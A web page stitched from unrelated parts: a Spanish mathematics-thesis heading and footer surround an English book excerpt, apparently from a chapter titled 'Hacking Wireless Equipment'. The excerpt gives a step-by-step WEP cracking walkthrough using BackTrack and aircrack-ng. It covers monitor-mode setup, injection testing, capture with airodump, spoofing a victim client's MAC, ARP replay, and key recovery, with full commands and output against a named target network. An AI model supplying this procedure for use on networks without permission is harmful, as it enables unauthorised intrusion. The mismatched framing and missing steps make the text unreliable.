Análisis del Pos Test del Grupo Experimental

5 METODOLOGÍA

5.4 ANÁLISIS DE RESULTADOS

5.4.5 Análisis del Pos Test del Grupo Experimental

First of all you will need to boot your laptop into the BackTrack envi- ronment using the CD-ROM or USB drive you prepared earlier. If you’re using the Alfa adapter, it requires no further conﬁguration. However if you’re using an Atheros-based card or the very popular Intel 3945 internal PCI chipset, you need to set them up.

Setting Up Atheros

To set up Atheros, execute the following commands from the terminal prompt:

# ifconfig ath0 down # wlanconfig ath0 destroy

# wlanconfig ath0 create wlandev WiFi0 wlanmode monitor# ifconfig ath0 up

The Atheros card is now in monitor mode and ready to start cracking. Setting Up Intel

The Intel card is a little different as we have to change to a driver capable of packet injection. Execute the following commands from the terminal prompt:

# ifconfig wlan0 down # modprobe -r iwl3945 # modprobe ipwraw # ifconfig WiFi0 up

The Intel card is now in monitor mode and ready to start cracking. Note that its identiﬁer has changed from wlan0 to WiFi0. You can check which interfaces on your system are wireless capable with the command:

132 HACKING WIRELESS EQUIPMENT

Accessing the Network

Regardless of the conﬁguration, execute the following command to test that injection is now working:

# aireplay-ng --testXXX

whereXXX is your wireless card identiﬁer. If successful, you should see something along the lines of the following:

10:57:54 Trying directed probe requests... 10:57:54 00:13:F7:20:7B:4D – channel: 6 – ‘SMC’

10:57:57 Ping (min/avg/max): 0.093ms/75.077ms/115.953ms Power: 46.87 10:57:57 30/30: 100%

10:57:57 Injection is working!

10:57:57 00:05:B4:0A:54:D8 – channel: 3 – ‘SweexMR’10:58:00 Ping (min/avg/max): 55.970ms/92.801ms/136.010ms Power: 31.93

10:58:00 30/30: 100%

10:58:00 00:13:F7:8B:43:9F – channel: 6 – ‘JJJJR’

If injection is not working for any given interface above and you’ve already put your card into monitor mode, you are probably too far from the wireless point to inject. Reception is always more sensitive than transmission.

From now on, I assume the identiﬁer for your wireless card is wlan1. Change this to whatever it is for you. Now open three terminal windows. In the ﬁrst type:

# airodump-ng wlan1

Airodump cycles through the 11 available channels looking for access points as shown here:

CH 2 ][ Elapsed: 0 s ][ 2009-02-19 10:59

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:22:6B:70:79:A6 32 2 0 0 11 54e OPN Home 00:18:F8:4A:BE:E1 30 3 0 0 11 54 . OPN linksys 00:90:D0:FA:E3:DD 18 2 0 0 11 54 WPA2 CCMP PSK ML 00:1E:E5:8C:94:BE 22 2 0 0 6 54 OPN linksys 00:19:CB:0A:EA:63 44 2 0 0 7 54 WPA TKIP PSK MVDH 00:13:49:B5:53:7E 32 2 0 0 7 54 WEP WEP ADSL- WiFi Anja

00:13:F7:8B:43:9F 43 3 0 0 6 54 . WPA2 CCMP PSK JJJJR

CRACKING ENCRYPTION 133

00:18:F6:64:63:25 44 2 0 0 1 54 WPA2 CCMP PSK Speed- Touch63593C

00:22:3F:20:C5:8E 49 2 0 0 1 54 . WPA TKIP PSK UPC53144 00:14:7F:8D:9F:7F 41 2 0 0 1 54 WPA TKIP PSK Speed- TouchADC252

8A:81:1B:D8:8F:85 -1 2 0 0 1 54 OPN wireless 00:13:D4:67:67:7D 26 3 0 0 1 54 WEP WEP pvg 00:13:49:10:0D:71 65 3 0 0 7 54 . WEP WEP ADSL-WiFi 00:13:F7:20:7B:4D 49 1 0 0 6 54 . OPN SMC BSSID STATION PWR Rate Lost Packets Probe

The target in this case is the network named wireless2 running on channel 5. Rerun Airodump, but this time restrict it to channel 5 and write the output to disk as follows:

# airodump-ng -c 5 --write wireless2

You get the following response:

CH 5 ][ Elapsed: 16 s ][ 2009-02-19 11:04

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:05:B4:0A:54:D8 24 16 27 0 0 3 54 . WPA TKIP PSK SweexMR 00:13:F7:20:7B:4D 41 5 24 1 0 6 54 . OPN SMC 00:1C:DF:05:C0:7E 43 42 62 0 0 6 54 . WPA TKIP PSK Vuurdesign 00:13:49:10:0D:71 69 96 79 0 0 7 54 . WEP WEP ADSL-WiFi 00:1E:E5:8C:94:BE 26 12 63 0 0 6 54 OPN linksys 00:13:F7:8B:43:9F 43 18 52 0 0 6 54 . WPA2 CCMP PSK JJJJR

00:04:ED:5A:8B:DB 69 77 154 5 0 5 54 WEP WEP wireless2

00:19:CB:0A:EA:63 34 52 91 0 0 7 54 WPA TKIP PSK MVDH

00:13:49:B5:53:7E 24 28 57 0 0 7 54 WEP WEP ADSL-WiFi Anja BSSID STATION PWR Rate Lost Packets Probe

00:04:ED:5A:8B:DB 00:1B:77:2E:46:45 -1 54-0 0 5

(not associated) 00:16:44:A5:EC:50 16 0- 1 0 2 ICIDU (not associated) 00:19:7E:2A:72:A5 15 0- 1 0 2 SX551D87F63 (not associated) 00:19:7E:BD:58:AC 35 0- 1 0 2

(not associated) 00:15:AF:E2:C7:9A 38 0- 1 178 9 SMC

The ﬁrst output shows all channels. In the second, the channel has been ﬁxed to CH5 using the -c 5 option. We do this so that we don’t miss any channel 5 data and to cut down on extraneous data we don’t want to see. At the bottom of the output, you can see a client laptop is associated with thewireless2access point. Be sure to make a note of the client MAC address because you want to appear to be this client. Change your local MAC address to match:

134 HACKING WIRELESS EQUIPMENT

and this is conﬁrmed for us:

Current MAC: 00:c0:ca:1b:5c:3a (Alfa, Inc.) Faked MAC: 00:1b:77:2e:46:45 (unknown)

In another window, type:

# aireplay-ng wlan1 -b 00:04:ED:5A:8B:DB -h 00:1B:77:2E:46:45 --arpreplay

-brefers to the MAC address for the access point and -h to the MAC address for our faked client. The command above produces the following results:

11:07:42 Waiting for beacon frame (BSSID: 00:04:ED:5A:8B:DB) on channel 5 Saving ARP requests in replay arp-0219-110742.cap

You should also start Airodump to capture replies:

Read 13824 packets (got 9 ARP requests and 11554 ACKs), sent 12508 packets...(500 pps)

The option --arpreplay refers to the type of attack you wish to launch. Aireplay waits for an ARP packet to be sent over the target network (which it can detect regardless of encryption, due to its unique characteristics). When it sees a packet, it captures the packet and reinjects it into the stream. This creates unique initialization vectors (IVs). For your purposes, lots of unique IVs is a good thing. You need them in order to crack the WEP key. When this happens the Data col- umn in Airodump for wireless2 starts to increase rapidly as shown here:

CH 5 ][ Elapsed: 12 s ][ 2009-02-19 11:08

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:13:49:B5:53:7E 29 7 13 0 0 7 54 WEP WEP ADSL-WiFi Anja 00:13:F7:20:7B:4D 40 18 34 0 0 6 54 . OPN SMC

00:05:B4:0A:54:D8 23 7 14 0 0 3 54 . WPA TKIP PSK SweexMR 00:13:49:10:0D:71 60 60 41 0 0 7 54 . WEP WEP ADSL-WiFi 00:19:CB:0A:EA:63 28 11 26 0 0 7 54 WPA TKIP PSK MVDH 00:13:F7:8B:43:9F 49 13 28 2 0 6 54 . WPA2 CCMP PSK JJJJR 00:1C:DF:05:C0:7E 46 32 48 0 0 6 54 . WPA TKIP PSK Vuurdesign 00:1E:E5:8C:94:BE 24 10 36 2 0 6 54 OPN linksys 00:04:ED:5A:8B:DB 72 96 130 13231 0 5 54 WEP WEP wireless2

CRACKING ENCRYPTION 135

BSSID STATION PWR Rate Lost Packets Probe (not associated) 00:19:7D:72:80:5C 23 0- 1 29 4 Home 00:04:ED:5A:8B:DB 00:1B:77:2E:46:45 47 0- 1 0 13998 wireless2

When you have a few thousand packets, you can attempt to crack the key. Type the following command:

# aircrack-ng wireless2-01.cap

The file wireless2-01.cap was created when we specified the -- write wireless2option with Airodump above. Were you to run that command again, the next file to be created would bewireless2-02.cap. If you have multiple captures from the same access point, don’t delete them, they can be combined using Aircrack. For example, the above command would become:

# aircrack-ng wireless2*.cap

Aircrack presents you with the menu shown here:

BSSID ESSID Encryption 1 00:04:ED:5A:8B:DB wireless2 WEP (14298 IVs) 2 00:19:CB:0A:EA:63 MVDH No data – WEP or WPA 3 00:13:49:10:0D:71 ADSL-WiFi No data – WEP or WPA 4 00:1C:DF:05:C0:7E Vuurdesign No data – WEP or WPA 5 00:13:F7:8B:43:9F JJJJR WPA (0 handshake) 6 00:1E:E5:8C:94:BE linksys None (0.0.0.0) 7 00:05:B4:0A:54:D8 SweexMR No data – WEP or WPA 8 00:13:F7:20:7B:4D SMC None (0.0.0.0) 9 00:13:49:B5:53:7E ADSL-WiFi Anja No data – WEP or WPA 10 00:13:F7:35:7D:09 Maurice No data – WEP or WPA 11 00:18:F8:6E:85:A3 M3b2d No data – WEP or WPA 12 00:13:F7:31:6E:54 SMC None (0.0.0.0) 13 00:1D:0F:D5:66:46 ICIDU No data – WEP or WPA Index number of target network ?

Select the option that corresponds to the access point in which you are interested (in this case, 1) and the cracking begins. You get the following output:

Aircrack-ng 1.0 rc2 r1414

[00:00:00] Tested 8050 keys (got 7988 IVs) KB depth byte(vote)

0 1/ 2 B4( 512) 01( 256) 46( 256) 5F( 256)9D(256)BC(256)00(0) 1 0/ 5 57( 256) 13( 256) 29( 256) 2D( 256)7C(256)7F(256)9D(256)

136 HACKING WIRELESS EQUIPMENT

2 0/ 1 DA( 256) 11( 256) 27( 256) 74( 256)76(256)7D(256)7F(256) 3 0/ 3 11( 256) 17( 256) 3E( 256) 5E( 256)95(256)A2(256)A3(256) 4 0/ 4 10( 256) 31( 256) 43( 256) 45( 256)62(256)68(256)AA(25)

Within seconds we have the key.

KB depth byte(vote) 0 0/ 9 12(15)F9(15)47(12)F7(12)FE(12)1B(5)77(5)A5(3)F6(3)03(0) 1 0/ 8 34(61)E8(27)E0(24)06(18)3B(16)4E(15)E1(15)2D(13)89(12) 2 0/ 2 56(87)A6(63)15(17)02(15)6B(15)E0(15)AB(13)0E(10)17(10) 3 1/ 5 78(43)1A(20)9B(20)4B(17)4A(16)2B(15)4D(15)58(15)6A(15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%

If there are ﬁve values following ‘KEY FOUND!’ then the key is 40 bit, any more than that and it’s 128 bit. There is no real difference in speed to cracking either.

As you can see, cracking WEP Shared Key cryptography is very straight- forward. It is a skill worth practicing because WEP, as has been previously noted, is still widely deployed in small businesses and within business departments unofﬁcially. It is not uncommon for employees to set up their own access point for convenience. Because WEP is marked as ‘secure’ in the setup screen, people assume it means just that. Administrators sometimes deploy WEP with additional security measures such as MAC address ﬁltering but this is even more trivial to bypass.

In document Secuencia didáctica para el desarrollo del pensamiento espacial en matemáticas en estudiantes de grado quinto, de la Institución Educativa Técnica La Ceiba, de Rovira Tolima (página 71-84)